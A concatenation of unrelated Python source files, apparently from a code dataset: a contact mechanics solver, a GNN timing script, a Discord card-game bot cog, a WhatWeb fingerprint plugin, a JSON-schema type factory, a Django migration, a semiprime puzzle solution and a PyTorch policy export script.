""" returns an array of all coordinates, where contact pressure is repulsive. Useful for evaluating the number of contact islands etc. """ return np.argwhere(self.interaction_force > 0.) def compute_attractive_coordinates(self): """ returns an array of all coordinates, where contact pressure is attractive. Useful for evaluating the number of contact islands etc. """ return np.argwhere(self.interaction_force < 0.) def compute_mean_gap(self): """ mean of the gap in the the physical domain (means excluding padding region for the FreeFFTElasticHalfspace) """ return self.reduction.sum(self.gap) / np.prod(self.nb_grid_pts) def logger_input(self): """ Returns ------- headers: list of strings values: list """ tot_nb_grid_pts = np.prod(self.nb_grid_pts) rel_rep_area = self.compute_nb_repulsive_pts() / tot_nb_grid_pts rel_att_area = self.compute_nb_attractive_pts() / tot_nb_grid_pts # TODO: eventually put a flag to turn # reductions off since this is an additional communication. return (['energy', 'max. abs. grad.', 'mean gap', 'frac. rep. area', 'frac. att. area', 'frac. int. area', 'substrate force', 'interaction force'], [self.energy, self.reduction.max(np.abs(self.force)), self.compute_mean_gap(), rel_rep_area, rel_att_area, rel_rep_area + rel_att_area, -self.reduction.sum(self.substrate.force), self.reduction.sum(self.interaction_force)]) def evaluate(self, disp, offset, pot=True, forces=False, logger=None): """ Compute the energies and forces in the system for a given displacement field Parameters: ----------- disp: ndarray displacement field, in the shape of system.substrate.nb_subdomain_grid_pts offset: float determines indentation depth, constant value added to the heights (system.topography) pot: bool, optional Wether to evaluate the energy, default True forces: bool, optional Wether to evaluate the forces, default False logger: ContactMechanics.Tools.Logger informations of current state of the system will be passed to logger at every evaluation """ # attention: the substrate may have a higher nb_grid_pts than the gap # and the interaction (e.g. FreeElasticHalfSpace) self.gap = self.compute_gap(disp, offset) interaction_energies, self.interaction_force, _ = \ self.interaction.evaluate(self.gap, potential=pot, gradient=forces, curvature=False) self.interaction_energy = \ self.reduction.sum(interaction_energies) * self.area_per_pt self.substrate.compute(disp, pot, forces) self.energy = (self.interaction_energy + self.substrate.energy if pot else None) if forces: self.interaction_force *= -self.area_per_pt # ^ gradient to force per pixel self.force = self.substrate.force.copy() self.force[self.comp_slice] += \ self.interaction_force else: self.force = None if logger is not None: logger.st(*self.logger_input()) return (self.energy, self.force) def objective(self, offset, disp0=None, gradient=False, disp_scale=1., logger=None): r""" This helper method exposes a scipy.optimize-friendly interface to the evaluate() method. Use this for optimization purposes, it makes sure that the shape of disp is maintained and lets you set the offset and 'forces' flag without using scipy's cumbersome argument passing interface. Returns a function of only disp Parameters: ----------- disp0: ndarray unused variable, present only for interface compatibility with inheriting classes offset: float determines indentation depth, constant value added to the heights (system.topography) gradient: bool, optional Wether to evaluate the gradient, default False disp_scale : float, optional (default 1.) allows to specify a scaling of the dislacement before evaluation. This can be necessary when using dumb minimizers with hardcoded convergence criteria such as scipy's L-BFGS-B. logger: ContactMechanics.Tools.Logger informations of current state of the system will be passed to logger at every evaluation Returns: function(disp) Parameters: disp: an ndarray of shape `system.substrate.nb_subdomain_grid_pts` displacements Returns: energy or energy, gradient """ res = self.substrate.nb_subdomain_grid_pts if gradient: def fun(disp): # pylint: disable=missing-docstring try: self.evaluate( disp_scale * disp.reshape(res), offset, forces=True, logger=logger) except ValueError as err: raise ValueError( "{}: disp.shape: {}, res: {}".format( err, disp.shape, res)) return (self.energy, -self.force.reshape(-1) * disp_scale) else: def fun(disp): # pylint: disable=missing-docstring return self.evaluate( disp_scale * disp.reshape(res), offset, forces=False, logger=logger)[0] return fun def primal_evaluate(self, disp, gap, pot=True, forces=False, logger=None): """ Compute the energies and forces in the system for a given displacement and gap.. Parameters: ----------- disp: ndarray displacement field, in the shape of system.substrate.nb_subdomain_grid_pts gap: ndarray gap , in the shape of system.substrate.nb_subdomain_grid_pts pot: bool, optional Whether to evaluate the energy, default True forces: bool, optional Whether to evaluate the forces, default False logger: ContactMechanics.Tools.Logger information of current state of the system will be passed to logger at every evaluation """ # attention: the substrate may have a higher nb_grid_pts than the gap # and the interaction (e.g. FreeElasticHalfSpace) self.gap = gap interaction_energies, self.interaction_force, _ = \ self.interaction.evaluate(self.gap, potential=pot, gradient=forces, curvature=False) self.interaction_energy = \ self.reduction.sum(interaction_energies) * self.area_per_pt self.substrate.compute(disp, pot, forces) self.energy = (self.interaction_energy + self.substrate.energy if pot else None) if forces: self.interaction_force *= -self.area_per_pt # ^ gradient to force per pixel self.force = self.substrate.force.copy() self.force[self.comp_slice] += self.interaction_force else: self.force = None if logger is not None: logger.st(*self.logger_input()) return (self.energy, self.force) def primal_objective(self, offset, disp0=None, gradient=False, logger=None): r"""To solve the primal objective using gap as the variable. Can be fed directly to standard solvers ex: scipy solvers etc and returns the elastic energy and it's gradient (negative of the forces) as a function of the gap. Parameters __________ gap : float gap between the contact surfaces. offset : float constant value to add to the surface heights pot : (default False) gradient : (default True) Returns _______ energy : float value of energy(scalar value). force : float,array value of force(array). Notes _____ Objective: .. math :: \min_u f = \frac{1}{2} u_i K_{ij} u_j + \phi (u_{ij})\\ \\ \nabla f = K_{ij} u_j + \phi^{\prime} \text{ which is the force} \\ """ res = self.substrate.nb_subdomain_grid_pts if gradient: def fun(gap): disp = gap.reshape(res) + self.surface.heights() + offset try: self.primal_evaluate( disp, gap.reshape(res), forces=True, logger=logger) except ValueError as err: raise ValueError( "{}: gap.shape: {}, res: {}".format( err, gap.shape, res)) return (self.energy, -self.force.reshape(-1)) else: def fun(gap): disp = gap.reshape(res) + self.surface.heights() + offset return self.primal_evaluate( disp, gap.reshape(res), forces=False, logger=logger)[0] return fun def primal_hessian_product(self, gap, des_dir): """Returns the hessian product of the primal_objective function. """ _, _, adh_curv = self.interaction.evaluate(gap, curvature=True) hessp_val = - self.substrate.evaluate_force( des_dir.reshape(self.substrate.nb_subdomain_grid_pts) ).reshape(np.shape(des_dir)) \ + adh_curv * des_dir * self.substrate.area_per_pt return hessp_val.reshape(des_dir.shape) def hessian_product_function(self, offset): def hessp(disp, des_dir): gap = disp.reshape(self.substrate.nb_subdomain_grid_pts )[self.comp_slice] \ - (self.surface.heights() + offset) _, _, adh_curv = self.interaction.evaluate(gap, curvature=True) hessp_val = - self.substrate.evaluate_force( des_dir.reshape(self.substrate.nb_subdomain_grid_pts) ) hessp_val[self.comp_slice] += adh_curv \ * des_dir.reshape( self.substrate.nb_subdomain_grid_pts)[self.comp_slice] * \ self.substrate.area_per_pt return hessp_val.reshape(des_dir.shape) return hessp def _fourier_coefficients(self): """ Returns the coefficients for elasticity matrix when working in fourier space for both 1D and 2D system. """ nx = self.substrate.nb_grid_pts[0] nb_dims = len(self.substrate.nb_grid_pts) if nb_dims == 2: ny = self.substrate.nb_grid_pts[1] coeffs = np.zeros(self.substrate.nb_grid_pts) if np.logical_and((nx % 2 == 0), (ny % 2 == 0)): coeffs[0, 0] = 1 / (nx * ny) coeffs[0, 1:ny // 2] = 2 / (nx * ny) coeffs[0, ny // 2 + 1:] = 2 / (nx * ny) coeffs[1:nx // 2, 0] = 2 / (nx * ny) coeffs[nx // 2 + 1:, 0] = 2 / (nx * ny) coeffs[:nx // 2, ny // 2] = 2 / (nx * ny) coeffs[nx // 2 + 1:, ny // 2] = 2 / (nx * ny) coeffs[nx // 2, :ny // 2] = 2 / (nx * ny) coeffs[nx // 2, ny // 2 + 1:] = 2 / (nx * ny) coeffs[1:nx // 2, 1:ny // 2] = 4 / (nx * ny) coeffs[nx // 2 + 1:, 1:ny // 2] = 4 / (nx * ny) coeffs[1:nx // 2, ny // 2 + 1:] = 4 / (nx * ny) coeffs[nx // 2 + 1:, ny // 2 + 1:] = 4 / (nx * ny) coeffs[nx // 2, ny // 2] = 1 / (nx * ny) coeffs[nx // 2, 0] = 1 / (nx * ny) coeffs[0, ny // 2] = 1 / (nx * ny) else: coeffs[0, 0] = 1 / (nx * ny) coeffs[0, 1:] = 2 / (nx * ny) coeffs[1:, 0] = 2 / (nx * ny) coeffs[1:, 1:] = 4 / (nx * ny) elif nb_dims == 1: coeffs = np.zeros(self.substrate.nb_grid_pts) if (nx % 2 == 0): coeffs[0] = 1 / nx coeffs[1:nx // 2] = 2 / nx coeffs[nx // 2 + 1:] = 2 / nx coeffs[nx // 2] = 1 / nx else: coeffs[0] = 1 / nx coeffs[1:] = 2 / nx return coeffs def evaluate_k(self, disp_k, gap, offset, mw=False, pot=True, forces=False, logger=None): """ Compute the energies and forces in the system for a given displacement field in fourier space. Parameters ----------- disp_k: ndarray displacement field in fourier space. gap: ndarray displacement field in real space, in the shape of system.substrate.nb_subdomain_grid_pts offset: float determines indentation depth, constant value added to the heights (system.topography) mw: bool, optional when mass weighting is required then set this to TRUE. pot: bool, optional Wether to evaluate the energy, default True forces: bool, optional Wether to evaluate the forces, default False logger: ContactMechanics.Tools.Logger informations of current state of the system will be passed to logger at every evaluation. """ # self.gap = self.compute_gap(disp, offset) self.gap = gap interaction_energies, self.interaction_force, _ = \ self.interaction.evaluate(self.gap, potential=pot, gradient=forces, curvature=False) self.interaction_energy = \ self.reduction.sum(interaction_energies) * self.area_per_pt self.grad_k = np.zeros(self.substrate.nb_grid_pts) coeff = self._fourier_coefficients() if mw: self.grad_k = disp_k * coeff else: self.grad_k = disp_k * coeff * self.stiffness_k self.grad_k *= self.area_per_pt # ENERGY FROM SUBSTRATE self.energy = 0.5 * (np.sum(self.grad_k * disp_k)) self.substrate.energy = self.energy self.force_h = -self.grad_k # TOTAL ENERGY self.energy += self.interaction_energy if forces: self.interaction_force *= -self.area_per_pt # ^ gradient to force per pixel self.real_buffer.array()[...] = self.interaction_force self.engine.hcfft(self.real_buffer, self.fourier_buffer) interaction_force_float_k = self.fourier_buffer.array()[...].copy() adh_coeffs = self._fourier_coefficients() interaction_force_float_k *= adh_coeffs if mw: k = np.sqrt(self.stiffness_k.copy() * self.area_per_pt) interaction_force_float_k = interaction_force_float_k * (1 / k) self.force_h += interaction_force_float_k else: self.force_h = None if logger is not None: disp_real = self.gap + self.surface.heights().copy() + offset force_real = self.substrate.evaluate_force(disp_real) force_real = force_real + self.interaction_force logger.st(*(['energy', 'max. abs. grad.', 'max. abs. grad. real'], [self.energy, self.reduction.max(np.abs(self.force_h)), self.reduction.max(np.abs(force_real)) ])) return (self.energy, self.force_h) # def hessian_product_k(self, dispk, des_dir_k): # """Returns the hessian product of the fourier space # objective_k function. # """ # self.substrate.fourier_buffer.array()[...] = dispk.copy() # self.substrate.fftengine.ifft(self.substrate.fourier_buffer, # self.substrate.real_buffer) # disp = self.substrate.real_buffer.array()[...].copy() \ # * self.substrate.fftengine.normalisation # # gap = self.compute_gap(disp) # _, _, adh_curv = self.interaction.evaluate(gap, curvature=True) # # self.substrate.real_buffer.array()[...] = adh_curv.reshape( # self.substrate.nb_grid_pts).copy() # self.substrate.fftengine.fft(self.substrate.real_buffer, # self.substrate.fourier_buffer) # adh_curv_k = self.substrate.fourier_buffer.array()[...].copy() # # hessp_val_k = -self.substrate.evaluate_k_force_k(des_dir_k) + \ # adh_curv_k * des_dir_k * self.substrate.area_per_pt # # return hessp_val_k # def hessian_product_preconditioned(self, offset): # def hessp_precond(disp_h, des_dir): # # self.real_buffer.array()[...] = offset # self.engine.hcfft(self.real_buffer, self.fourier_buffer) # offset_k = self.fourier_buffer.array()[...].copy() # # self.real_buffer.array()[...] = self.surface.heights().copy() # self.engine.hcfft(self.real_buffer, self.fourier_buffer) # self.heights_k_float = self.fourier_buffer.array()[...].copy() # # disp_float_k = disp_h.copy() # disp_float_k = disp_float_k.reshape(self.substrate.nb_grid_pts) # gap_float_k = (disp_float_k / np.sqrt(self.stiffness_k * # self.area_per_pt)) - \ # self.heights_k_float - offset_k # # self.fourier_buffer.array()[...] = gap_float_k.copy() # self.engine.ihcfft(self.fourier_buffer, self.real_buffer) # gap = self.real_buffer.array()[...].copy() * \ # self.engine.normalisation # # _, _, adh_curv = \ # self.interaction.evaluate(gap, # curvature=True) # # coeff = self._fourier_coefficients() # # el_hess_k = coeff @ coeff # el_hess_k *= self.area_per_pt # # orig_shape = np.shape(des_dir) # # el_hess_k *= des_dir #.reshape(el_hess_k) # # adh_curv *= self.area_per_pt # # self.real_buffer.array()[...] = adh_curv # self.engine.hcfft(self.real_buffer, self.fourier_buffer) # adh_curv_float_k = self.fourier_buffer.array()[...].copy() # # adh_curv_float_k *= coeff @ coeff # # k = np.sqrt(self.stiffness_k.copy() * self.area_per_pt) # # adh_hess_k = adh_curv_float_k * des_dir * (1 / k) * (1 / k) # # hess_k = el_hess_k.reshape(orig_shape) + \ # adh_hess_k.reshape(orig_shape) # # return hess_k # # return hessp_precond def preconditioned_objective(self, offset, gradient=False, logger=None): r""" This helper method interface to the evaluate_k() method with preconditioning active. That is, it tries to solve a simpler problem formulated using, original problem: .. math :: \frac{1}{2(n_x n_y)} \tilde{u}\tilde{K} \bar{\tilde{u}} + \phi(F^{-1}(\tilde{u} - \tilde{h})) preconditioned problem: .. math :: \tilde{v} = \tilde{k}^{\frac{1}{2}} \tilde{u} \\ \frac{1}{2(n_x n_y)} \tilde{v}\bar{\tilde{v}} + \phi(F^{-1}(\frac{\tilde{v}}{\tilde{k}^{\frac{1}{2}}} - \tilde{h})) we solve for variable :math:`\tilde{v}`. Parameters: ----------- offset: float determines indentation depth, constant value added to the heights (system.topography) gradient: bool, optional Whether to evaluate the gradient, default False logger: ContactMechanics.Tools.Logger information of current state of the system will be passed to logger at every evaluation Returns _______ function(disp_k) Parameters __________ disp_k: an ndarray in fourier halfcomplex space Returns _______ energy: scalar energy of the system force_h: an halfcomplex array of shape(disp_k) force of the system """ # TODO: fourier transforming the offset is useless self.real_buffer.array()[...] = offset self.engine.hcfft(self.real_buffer, self.fourier_buffer) offset_k = self.fourier_buffer.array()[...].copy() self.real_buffer.array()[...] = self.surface.heights().copy() self.engine.hcfft(self.real_buffer, self.fourier_buffer) self.heights_k_float = self.fourier_buffer.array()[...].copy() if gradient: def fun(disp_): disp_float_k = disp_.copy() orig_shape = np.shape(disp_float_k) disp_float_k = disp_float_k.reshape(self.substrate.nb_grid_pts) gap_float_k = (disp_float_k / np.sqrt(self.stiffness_k * self.area_per_pt)) - \ self.heights_k_float - offset_k self.fourier_buffer.array()[...] = gap_float_k.copy() self.engine.ihcfft(self.fourier_buffer, self.real_buffer) gap = self.real_buffer.array()[...].copy() * self.engine.normalisation self.energy, self.force_h = self.evaluate_k(disp_float_k, gap, offset, mw=True, forces=True, logger=logger ) return (self.energy, -self.force_h.reshape(orig_shape)) else: raise NotImplementedError return fun def objective_k_float(self, offset, gradient=False, logger=None): r""" Returns callable objective as needed by scipy minimizers. The optimisation varialbe is the halfcomplex fourier transform of the gap. This helper method interface to the evaluate_k() method without preconditioning active. .. math :: \frac{1}{2(n_x n_y)} \tilde{u}\tilde{K} \bar{\tilde{u}} + \phi(F^{-1}(\tilde{u} - \tilde{h})) \\ preconditioned problem: .. math :: \tilde{v} = \tilde{k}^{\frac{1}{2}} \tilde{u} \\ \frac{1}{2(n_x n_y)} \tilde{v} \bar{\tilde{v}} + \phi(F^{-1}(\frac{\tilde{v}}{\tilde{k}^{\frac{1}{2}}} - \tilde{h})) \\ we solve for variable :math:`\tilde{v}`. Parameters: ----------- offset: float determines indentation depth, constant value added to the heights (system.topography) gradient: bool, optional Whether to evaluate the gradient, default False logger: ContactMechanics.Tools.Logger information of current state of the system will be passed to logger at every evaluation Returns _______ function(disp_k) Parameters __________ disp_k: an ndarray in fourier space Returns _______ energy, gradient_k_float """ self.real_buffer.array()[...] = offset self.engine.hcfft(self.real_buffer, self.fourier_buffer) offset_k = self.fourier_buffer.array()[...].copy() self.real_buffer.array()[...] = self.surface.heights().copy() self.engine.hcfft(self.real_buffer, self.fourier_buffer) self.heights_k_float = self.fourier_buffer.array()[...].copy() if gradient: def fun(disp_k): disp_float_k = disp_k.copy() orig_shape = np.shape(disp_float_k) disp_float_k = disp_float_k.reshape(self.substrate.nb_grid_pts) gap_float_k = disp_float_k - self.heights_k_float - offset_k self.fourier_buffer.array()[...] = gap_float_k.copy() self.engine.ihcfft(self.fourier_buffer, self.real_buffer) gap = self.real_buffer.array()[...].copy() \ * self.engine.normalisation self.energy, self.force_h = self.evaluate_k(disp_float_k, gap, offset, forces=True, logger=logger ) return (self.energy, -self.force_h.reshape(orig_shape)) else: def fun(disp_k): # pylint: disable=missing-docstring disp_float_k = disp_k.copy() disp_float_k = disp_float_k.reshape(self.substrate.nb_grid_pts) gap_float_k = disp_float_k - self.heights_k_float - offset_k self.fourier_buffer.array()[...] = gap_float_k.copy() self.engine.ihcfft(self.fourier_buffer, self.real_buffer) gap = self.real_buffer.array()[...].copy() \ * self.engine.normalisation return self.evaluate_k(disp_float_k, gap, offset, forces=True, logger=logger)[0] return fun def callback(self, force=False): """ Simple callback function that can be handed over to scipy's minimize to get updates during minimisation Parameters: ---------- force: bool, optional whether to include the norm of the force vector in the update message (default False) """ counter = 0 if force: def fun(dummy): "includes the force norm in its output" nonlocal counter counter += 1 print("at it {}, e = {}, |f| = {}".format( counter, self.energy, np.linalg.norm(np.ravel(self.force)))) else: def fun(dummy): "prints messages without force information" nonlocal counter counter += 1 print("at it {}, e = {}".format( counter, self.energy)) return fun class BoundedSmoothContactSystem(SmoothContactSystem): @staticmethod def handles(*args, **kwargs): # FIXME work around, see issue #208 return False def compute_nb_contact_pts(self): """ compute and return the number of contact points. """ return self.reduction.sum(np.where(self.gap == 0., 1., 0.)) def logger_input(self): """ Returns ------- headers: list of strings values: list """ tot_nb_grid_pts = np.prod(self.nb_grid_pts) rel_rep_area = self.compute_nb_repulsive_pts() / tot_nb_grid_pts rel_att_area = self.compute_nb_attractive_pts() / tot_nb_grid_pts # TODO: eventually put a flag to turn # reductions off since this is an additional communication. contacting_points = self.gap == 0. mask = np.ones(self.substrate.nb_subdomain_grid_pts) mask[self.substrate.local_topography_subdomain_slices][ contacting_points] = 0 max_proj_grad = self.reduction.max(abs(mask * self.force)) return (['energy', 'max. proj. grad.', 'mean gap', 'frac. cont. area', 'frac. rep. area', 'frac. att. area', 'frac. int. area', 'substrate force', 'interaction force'], [self.energy, max_proj_grad, self.compute_mean_gap(), self.compute_nb_contact_pts() / np.prod(self.nb_grid_pts), rel_rep_area, rel_att_area, rel_rep_area + rel_att_area, -self.reduction.sum(self.substrate.force), self.reduction.sum(self.interaction_force)]) def compute_normal_force(self): "computes and returns the sum of all forces" # sum of the jacobian in the contact area (Lagrange multiplier) # and the ineraction forces. # can also be computed easily from the substrate forces, # what we do here return self.reduction.sum( - self.substrate.force[self.substrate.local_topography_subdomain_slices]) def compute_repulsive_force(self): """computes and returns the sum of all repulsive forces Assumptions: there """ return self.reduction.sum( np.where( - self.substrate.force[ self.substrate.local_topography_subdomain_slices] > 0, - self.substrate.force[ self.substrate.local_topography_subdomain_slices], 0.)) def compute_attractive_force(self): "computes and returns the sum of all attractive forces" return self.reduction.sum( np.where( - self.substrate.force[ self.substrate.local_topography_subdomain_slices] < 0, - self.substrate.force[ self.substrate.local_topography_subdomain_slices], 0.)) def compute_nb_repulsive_pts(self): """ compute and return the number of contact points under repulsive pressure. """ return self.reduction.sum( np.where( np.logical_and( self.gap == 0., - self.substrate.force[ self.substrate.local_topography_subdomain_slices] > 0), 1., 0.)) def compute_nb_attractive_pts(self): """ compute and return the number of contact points under attractive pressure. """ # Compute points where substrate force is negative # or there is no contact pts = np.logical_or(- self.substrate.force[ self.substrate.local_topography_subdomain_slices] < 0, self.gap > 0.) # exclude points where there is no contact # and the interaction force is 0. pts[np.logical_and(self.gap > 0., self.interaction_force == 0.)] = 0. return self.reduction.sum(pts) def compute_repulsive_coordinates(self): """ returns an array of all coordinates, where contact pressure is repulsive. Useful for evaluating the number of contact islands etc. """ return np.argwhere( np.logical_and( self.gap == 0., - self.substrate.force[ self.substrate.local_topography_subdomain_slices] > 0)) def compute_attractive_coordinates(self): """ returns an array of all coordinates, where contact pressure is attractive. Useful for evaluating the number of contact islands etc. """ # Compute points where substrate force is negative # or there is no contact pts = np.logical_or( - self.substrate.force[self.substrate.local_topography_subdomain_slices] < 0, self.gap > 0.) # exclude points where there is no contact # and the interaction force is 0. pts[np.logical_and(self.gap > 0., self.interaction_force == 0.)] = 0. return np.argwhere(pts)
StarcoderdataPython
3294314
from __future__ import division from __future__ import print_function import datetime import json import logging import os import pickle import time import numpy as np import optimizers import torch from config import parser from models.base_models import NCModel, LPModel from utils.data_utils import load_data from utils.train_utils import get_dir_name, format_metrics import torch.cuda.profiler as profiler def test(args): np.random.seed(args.seed) torch.manual_seed(args.seed) if int(args.double_precision): torch.set_default_dtype(torch.float64) if int(args.cuda) >= 0: torch.cuda.manual_seed(args.seed) args.device = 'cuda:' + str(args.cuda) if int(args.cuda) >= 0 else 'cpu' args.patience = args.epochs if not args.patience else int(args.patience) logging.getLogger().setLevel(logging.INFO) if args.save: if not args.save_dir: dt = datetime.datetime.now() date = f"{dt.year}_{dt.month}_{dt.day}" models_dir = os.path.join(os.environ['LOG_DIR'], args.task, date) save_dir = get_dir_name(models_dir) else: save_dir = args.save_dir logging.basicConfig(level=logging.INFO, handlers=[ logging.FileHandler(os.path.join(save_dir, 'log.txt')), logging.StreamHandler() ]) logging.info(f'Using: {args.device}') logging.info("Using seed {}.".format(args.seed)) # Load data data = load_data(args, os.path.join(os.environ['DATAPATH'], args.dataset)) args.n_nodes, args.feat_dim = data['features'].shape if args.task == 'nc': Model = NCModel args.n_classes = int(data['labels'].max() + 1) logging.info(f'Num classes: {args.n_classes}') else: args.nb_false_edges = len(data['train_edges_false']) args.nb_edges = len(data['train_edges']) if args.task == 'lp': Model = LPModel else: Model = RECModel # No validation for reconstruction task args.eval_freq = args.epochs + 1 if not args.lr_reduce_freq: args.lr_reduce_freq = args.epochs # Model and optimizer model = Model(args) checkpoint_path="hgcn_chkpt/model.pth" model.load_state_dict(torch.load(checkpoint_path)) logging.info(str(model)) optimizer = getattr(optimizers, args.optimizer)(params=model.parameters(), lr=args.lr, weight_decay=args.weight_decay) lr_scheduler = torch.optim.lr_scheduler.StepLR( optimizer, step_size=int(args.lr_reduce_freq), gamma=float(args.gamma) ) tot_params = sum([np.prod(p.size()) for p in model.parameters()]) logging.info(f"Total number of parameters: {tot_params}") if args.cuda is not None and int(args.cuda) >= 0 : os.environ['CUDA_VISIBLE_DEVICES'] = str(args.cuda) model = model.to(args.device) for x, val in data.items(): if torch.is_tensor(data[x]): data[x] = data[x].to(args.device) if len(args.time_file) == 0: model.eval() # set evaluation mode embeddings = model.encode(data['features'], data['adj_train_norm']) val_metrics = model.compute_metrics(embeddings, data, 'val') else: n_warmup = 50 n_sample = 50 model.eval() # set evaluation mode print("=== Running Warmup Passes") for i in range(0,n_warmup): embeddings = model.encode(data['features'], data['adj_train_norm']) val_metrics = model.compute_metrics(embeddings, data, 'val') print("=== Collecting Runtime over ", str(n_sample), " Passes") tic = time.perf_counter() for i in range(0,n_sample): embeddings = model.encode(data['features'], data['adj_train_norm']) val_metrics = model.compute_metrics(embeddings, data, 'val') toc = time.perf_counter() avg_runtime = float(toc - tic)/n_sample print("average runtime = ", avg_runtime) # write runtime to file f = open(args.time_file, "w") f.write(str(avg_runtime)+"\n") f.close() if __name__ == '__main__': parser.add_argument('--time_file', type=str, default='', help='timing output file') args = parser.parse_args() profiler.start() test(args) profiler.stop()
StarcoderdataPython
59350
import discord from discord.ext import commands from discord.utils import get class c211(commands.Cog, name="c211"): def __init__(self, bot: commands.Bot): self.bot = bot @commands.command(name='Scorn_Operative_Turncoat', aliases=['c211','Scorn_Operative_17']) async def example_embed(self, ctx): embed = discord.Embed(title='Scorn Operative - Turncoat', color=0x00008B) embed.set_thumbnail(url='https://www.duelingbook.com/images/custom-pics/2300000/2348936.jpg') embed.add_field(name='Status (Archetype)', value='Casual:3/Tournament:3 (Scorn Operative)', inline=True) embed.add_field(name='Type (Attribute)', value='Cyberse/Link/Effect (DARK)', inline=False) embed.add_field(name='Link Rating (ATK/Link Arrows)', value='1 (1500/⬇️)', inline=False) embed.add_field(name='Monster Effect', value='1 "Scorn Operative" monster with exactly 2000 ATK\nQuick Effect): You can return 1 "Scorn Operative" non-Effect Monster you control to the hand or Extra Deck; reduce the ATK of 1 monster on the field by 1500, and if you do, increase this card\'s ATK by 1000 until the End Phase.', inline=False) embed.set_footer(text='Set Code: GMMP') await ctx.send(embed=embed) def setup(bot: commands.Bot): bot.add_cog(c211(bot))
StarcoderdataPython
3355878
#!/usr/bin/env python # encoding: utf-8 def run(whatweb, pluginname): whatweb.recog_from_file(pluginname, "login/applyTheme/css/StyleSheet.css", "FE system")
StarcoderdataPython
3273637
<reponame>locationlabs/jsonschema-types """ Factory for schema-based types. """ import sys from inflection import camelize, underscore from jsonschema.compat import urlsplit from jsonschematypes.model import ( Attribute, SchemaAwareDict, SchemaAwareList, SchemaAwareString, DEFAULT, DESCRIPTION, PROPERTIES, REQUIRED, TYPE, ) if sys.version > '3': long = int class TypeFactory(object): """ Factory that knows how to make new model classes for schemas. `TypeFactory` also implements module loader/finder abstractions for fancy imports. """ PRIMITIVE_BASES = { # There's hopefully no good reason to define a custom boolean type # (e.g. with enumerated values) because the only legal values are # True and False *AND* Python doesn't let you extend boolean. # # See: https://mail.python.org/pipermail/python-dev/2002-March/020822.html "boolean": bool, # There are arguments for custom long and float types, but YAGNI. "integer": long, "number": float, } SCHEMA_AWARE_BASES = { "array": SchemaAwareList, "object": SchemaAwareDict, "string": SchemaAwareString, } def __init__(self, registry): self.registry = registry self.classes = {} def class_name_for(self, schema_id): """ Choose a class name for a given schema id. """ path = urlsplit(schema_id).path last = path.split("/")[-1].split(".", 1)[0] return str(camelize(last)) def attribute_name_for(self, property_name): """ Choose an attribute name for a property name. """ return str(underscore(property_name)) def make_class(self, schema_id, extra_bases=()): """ Create a Python class that maps to the given schema. :param extra_bases: extra bases to add to generated types """ if schema_id in self.classes: return self.classes[schema_id] schema = self.registry[schema_id] schema_type = schema.get(TYPE, "object") # skip type generation for primitives if schema_type in TypeFactory.PRIMITIVE_BASES: return TypeFactory.PRIMITIVE_BASES.get(schema_type) base = TypeFactory.SCHEMA_AWARE_BASES[schema_type] bases = (base, ) + extra_bases class_name = self.class_name_for(schema_id) # save backref and metadata within the class definition attributes = dict( _ID=schema_id, _REGISTRY=self.registry, _SCHEMA=schema, ) # include class level doc string if available if DESCRIPTION in schema: attributes["__doc__"] = schema[DESCRIPTION] # inject attributes for each property if schema_type == "object": attributes.update({ self.attribute_name_for(property_name): Attribute( registry=self.registry, key=property_name, description=property_.get(DESCRIPTION), required=property_name in schema.get(REQUIRED, []), default=property_.get(DEFAULT), ) for property_name, property_ in schema.get(PROPERTIES, {}).items() }) # create the class cls = type(class_name, bases, attributes) self.classes[schema_id] = cls return cls
StarcoderdataPython
1674601
<reponame>karilint/TaxonManager # Generated by Django 3.2.9 on 2022-04-30 12:34 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('front', '0004_taxonomicunit_expert'), ] operations = [ migrations.AlterField( model_name='expert', name='exp_comment', field=models.CharField(blank=True, max_length=500, null=True), ), ]
StarcoderdataPython
112436
import fiona as fio def get_features_list(vector_file, feature_key_name): """Function creates feature list in the multipolygon based on the given unique property (feature_key_name) such as ID. :param vector_file: multipolygon file, :param feature_key_name: unique key for features differentiation, :return features_list: list of unique features in the multipolygon.""" features_list = [] with fio.open(vector_file, 'r') as multipolygon: for poly in multipolygon: features_list.append(poly['properties'][feature_key_name]) return features_list
StarcoderdataPython
5346
<reponame>PK-100/Competitive_Programming import math def square(n): tmp=round(math.sqrt(n)) if tmp*tmp==n: return False else: return True def semprime(n): ch = 0 if square(n)==False: return False for i in range(2, int(math.sqrt(n)) + 1): while n%i==0: n//=i ch+=1 if ch >= 2: break if(n > 1): ch += 1 return ch == 2 def check(n): if semprime(n) == True: return True else: return False for _ in range(int(input())): n=int(input()) flag=0 for i in range(2,n//2+1): if check(i)==True and check(n-i)==True: #print(i,n-i,square(i),square(n-i),"Yes") print("YES") flag=1 break if flag==0: #print(i,n-i,square(i),square(n-i),"No") print("NO")
StarcoderdataPython
40078
""" Script to export a PyTorch-based Pyrado policy to C++ """ import numpy as np import torch as to from rcsenv import ControlPolicy from pyrado.policies.linear import LinearPolicy from pyrado.policies.rnn import RNNPolicy from pyrado.spaces.box import BoxSpace from pyrado.utils.data_types import EnvSpec from pyrado.policies.features import FeatureStack, squared_feat, identity_feat, const_feat def create_nonrecurrent_policy(): return LinearPolicy( EnvSpec( BoxSpace(-1, 1, 4), BoxSpace(-1, 1, 3), ), FeatureStack([ const_feat, identity_feat, squared_feat ]) ) def create_recurrent_policy(): return RNNPolicy( EnvSpec( BoxSpace(-1, 1, 4), BoxSpace(-1, 1, 3), ), hidden_size=32, num_recurrent_layers=1, hidden_nonlin='tanh' ) if __name__ == '__main__': tmpfile = '/tmp/torchscriptsaved.pt' to.set_default_dtype(to.double) # Create a Pyrado policy model = create_nonrecurrent_policy() # model = create_recurrent_policy() # Trace the Pyrado policy (inherits from PyTorch module) traced_script_module = model.trace() print(traced_script_module.graph) # Save the scripted module traced_script_module.save(tmpfile) # Load in C++ cp = ControlPolicy('torch', tmpfile) # Print more digits to.set_printoptions(precision=8, linewidth=200) np.set_printoptions(precision=8, linewidth=200) print(f'manual: {model(to.tensor([1, 2, 3, 4], dtype=to.get_default_dtype()))}') print(f'script: {traced_script_module(to.tensor([1, 2, 3, 4], dtype=to.get_default_dtype()))}') print(f'cpp: {cp(np.array([1, 2, 3, 4]), 3)}')
StarcoderdataPython
1639614
